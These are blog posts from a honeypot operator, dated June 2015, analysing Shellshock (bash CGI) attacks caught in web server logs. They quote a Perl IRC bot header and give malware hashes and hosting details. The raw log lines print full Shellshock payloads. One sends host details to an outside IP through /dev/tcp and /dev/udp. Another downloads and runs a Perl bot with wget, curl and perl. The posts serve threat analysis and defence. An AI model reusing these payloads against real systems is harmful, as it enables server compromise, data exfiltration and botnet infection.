Donnerstag, 18. Juni 2015

Shellinjection attack: /dev/tcp/74.208.79.34/21 -- bash echo

My Honeypot was attacked by
Jun 18 06:42:08 beeswarm [mypyfwa] 2015-06-18 06:42:08.029145 213.165.70.245 - - [17/Jun/2015:16:11:21 +0200] "GET /cgi-bin/bash HTTP/1.1" 404 529 "() { :;}; /bin/bash -c \"echo 109.234.106.8/cgi-bin/bash  > /dev/tcp/74.208.79.34/21; /bin/uname -a > /dev/tcp/74.208.79.34/21; echo 109.234.106.8/cgi-bin/bash > /dev/udp/74.208.79.34/21\"" "() { :;}; /bin/bash -c \"echo 109.234.106.8/cgi-bin/bash  > /dev/tcp/74.208.79.34/21; /bin/uname -a > /dev/tcp/74.208.79.34/21; echo 109.234.106.8/cgi-bin/bash > /dev/udp/74.208.79.34/21\"" 213.165.70.245 DE SHELLinjection
So, what is happening here:
  1. I needed to ask the experts on what could be done via "> /dev/tcp/74.208.79.34/21", the result is quite simple, a feature by the bash could lead to opening a tcp connection to 74.208.79.34 port 21
  2. The attacker tried to report the vulnerability of my server to the ip address within the attack.
  3. He tried it via UDP and TCP
The source of the attack was:  213.165.70.245 which is a server hosted by "1&1 Internet Inc."

The reporting destination was:  74.208.79.34 which is a server hosted by the same company.

Sonntag, 14. Juni 2015

JST IrcBot revisited

Maybe you remember the shellinjection I reported yesterday.
This morning I took the time to read a bit through the code

 JST Perl IrcBot v3.0 / 2011 by FrankBlack @ Millenium Group
 Stealth MultiFunctional IrcBot writen in Perl
 Teste on every system with PERL instlled     

 This is a free program used on your own risk.  
 Created for educational purpose only.             
 I'm not responsible for the illegal use of this program. 


The bot has some nice features and is very nice written. 
Again the software is detected via clamscan

den: Trojan.IRCBot-1142
and if it is not a mistake (by not changing the origin address)



even as it looks like a example, the domain well responds to ping and the IRC server runs :-)



Perl script injection: 85.214.60.234/den

The last two days several Shell injections have hit my Honeypot. Any of them tried to download a prscript and execute it

Jun 13 06:42:11 beeswarm [mypyfwa] 2015-06-13 06:42:11.531828 74.208.167.71 - - [12/Jun/2015:20:25:25 +0200] "GET / HTTP/1.1" 404 442 "() { :;}; cd /var/spool/samba/;wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den;rm -fr den*\"" "() { :;}; cd /var/spool/samba/;wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den;rm -fr den*\"" 74.208.167.71 US SHELLinjection
I have downloaded the file manually, it is a perl IRCbot.

 /XFupload.py -f den
{"malware":{"type":"md5","md5":"0x7AE21F4543FE5F842A7BB9F79D95A88E","origins":{"external":{"detectionCoverage":35,"family":["trojan"]}}}}
and
clamscan den
den: Trojan.IRCBot-1142 FOUND
The sources of the attrack are
  •  223.252.35.159 (AU)
  • 74.208.167.71 (US)
Both hosts seem to be hosted servers (1and1 and Ozservers)

The perl script seems to be written by "Jericho Security Team Perl Bot v3.0"
Strange as it is, the server address within the script is set to
place.youredomainhere.net

Or even more strange that this domain is hosted by schlund

inetnum:        87.106.0.0 - 87.106.15.255
netname:        SCHLUND-CUSTOMERS
descr:          1&1 Internet AG
country:        DE